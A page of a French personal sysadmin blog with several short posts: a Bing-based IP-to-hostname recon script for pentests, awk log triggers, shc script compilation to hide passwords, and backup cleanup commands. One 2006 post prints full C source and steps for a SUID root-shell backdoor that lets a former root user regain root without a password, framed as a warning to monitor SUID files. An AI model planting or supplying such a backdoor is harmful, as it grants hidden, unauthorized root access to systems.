Yop

Aller au contenu | Aller au menu | Aller à la recherche

dimanche, 24 avril 2011

Script pour trouver les sites web d'une IP

J'avais déjà parlé de cette méthode dans ce post ... voici le script bash GPL qui l'implémente:

bing-ip2hosts permet de lister les sites web d'une IP.

Bing-ip2hosts uses this feature to enumerate all hostnames which Bing has indexed for a specific IP address. This technique is considered best practice during the reconnaissance phase of a penetration test in order to discover a larger potential attack surface.


$ bing-ip2hosts free.fr
actualite.portail.free.fr
automobile.portail.free.fr
blogs.aliceadsl.fr
cine-serie-tv.portail.free.fr
ftth.free.fr
high-tech.portail.free.fr
ifw.fr
img3.free.fr
jeux-en-ligne.portail.free.fr
jeux-video.portail.free.fr
logiciels-libres.portail.free.fr
musique.portail.free.fr
portail.free.fr
services.portail.free.fr
television.portail.free.fr
voyage.portail.aliceadsl.fr
voyage.portail.free.fr
www.aliceadsl.fr
www.alicebox.fr
www.free.fr
$

On pourra avantageusement modifier ces lignes:

# IP=`resolveip -s "$1"`
IP=`dig "$1" +short`


mercredi, 19 août 2009

Execution de commande lors de la détection d'un mot dans les logs

Une commande pouvant être utilisée pour envoyer un mail lors de la détection est:

$ tail -f /var/log/messages | awk ' /toto/ { system("echo toto | mail -s pouet toto@aaa.tld") }'


Pour déclencher lors d'un test on peut utiliser:

$ logger -t TEST totofgdfsdfsdf



Extraits des man:

man awk
The pattern comes first, and then the action. Action statements are enclosed in { and }.
For /regular expression/ patterns, the associated statement is executed for each input record that matches the regular expression.
system(cmd-line) Execute the command cmd-line, and return the exit status.
EXAMPLES
Run an external command for particular lines of data:
tail -f access_log | awk '/myhome.html/ { system("nmap " $1 ">> logdir/myhome.html") }'


man system
system - Exécuter une commande shell
La fonction system() exécute la commande indiquée dans commande en appelant /bin/sh -c commande...

vendredi, 2 mai 2008

shc - Generic shell script compiler

En gros, shc permet de compiler un script shell...et donc d'obtenir un binaire executable (portable avec l'option -r).
L'avantage principal, c'est surtout qu'il devient plus difficile de "voir" le contenu du script...Cela permet de décourager ou de ralentir les curieux...
On peut donc l'utiliser par example pour compliquer la lecture des scripts qui contiennent des mots de passe...

/!\ Il doit être possible avec des debuggers ou des "ps" etc... d'obtenir le code source.. voir même peut être de déterminer la clé de chiffrement...mais disons que c'est toujours un peu mieux que le pass complètement en clair dans le .sh quand il n'y a vraiment pas le choix et que ce n'est pas pour protéger le lançement de missiles nucléaires...

$ sudo apt-get install shc
$ cat toto.sh
#!/bin/sh
echo ataatatataat
$ shc -r -f toto.sh
$ ls |grep toto
toto.sh
toto.sh.x
toto.sh.x.c
$ ./toto.sh.x
ataatatataat
$ strings toto.sh.x | grep ataa
$

Plus d'infos sur les limites ici et .

Si quelqu'un a fait des tests de sécurité sur la version 3.8.6... ?

jeudi, 13 avril 2006

Script pour repasser root

Une fois qu'un user a eu les droits root une fois, il est très simple pour lui de se créer un moyen de repasser root ultérieurement sans avoir à rentrer de mot de passe...

Conclusion:

  • Ne pas donner un accès root à un user en se disant que de toute façon en changera le mot de passe après.
  • Surveiller les fichiers SUID/GUID du système

root@yop:~ # cat /tmp/back.c
#include <unistd.h>
int main(int ac, char **av)
{
setuid(0);
setgid(0);
execl("/bin/sh", "sh", 0);
}
root@yop:~ # gcc -o backd back.c
root@yop:~ # chmod 4711 backd
root@yop:~ # ll /tmp/|grep back
-rw-r--r-- 1 root root 101 Apr 13 11:01 back.c
-rws--x--x 1 root root 7242 Apr 13 11:02 backd

[yannick@yop /tmp] ./backd
sh-3.00# id
uid=0(root) gid=0(root) groupes=[...]
sh-3.00#
sh-3.00# whoami
root
sh-3.00#

mercredi, 15 février 2006

Script - Vieux fichiers

2 petites lignes qui peuvent servir dans des scripts pour supprimer des vieux fichiers de backup etc..

  • Pour supprimer les fichiers qui ont été modifiés, pour la dernière fois, il y a plus de 30 jours (ou autrement dit pour ne conserver que les fichiers de moins de 30 jours):

Avantage -> pas de risque de supprimer un fichier récent

find /var/backuptoto/ -name 'backup*' -mtime +30 | xargs rm -f



-mtime n
Fichier dont les données ont été modifiées il y a n*24 heures.

+n
supérieur à n

  • Pour supprimer le plus vieux fichier d'un répertoire:

Avantage -> bon compromis entre faire de la place et garder un maximum de fichiers

ls -t /var/backuptoto/ | tail -1 | xargs rm -f

-t
Trier le contenu des répertoires en fonction de la date et non pas en ordre alphabétique. Les fichiers les plus récents sont présentés en premier.

- page 2 de 3 -